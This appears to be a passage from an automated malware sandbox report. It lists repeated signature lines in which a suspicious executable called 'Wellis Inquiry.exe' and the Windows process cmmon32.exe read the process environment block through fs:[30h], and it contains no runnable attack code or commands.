          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04713D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04753540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04783D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0475A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04788DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0478FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04708E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04791608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04718EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0478FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470A70E mov eax, dword ptr fs:[00000030h]
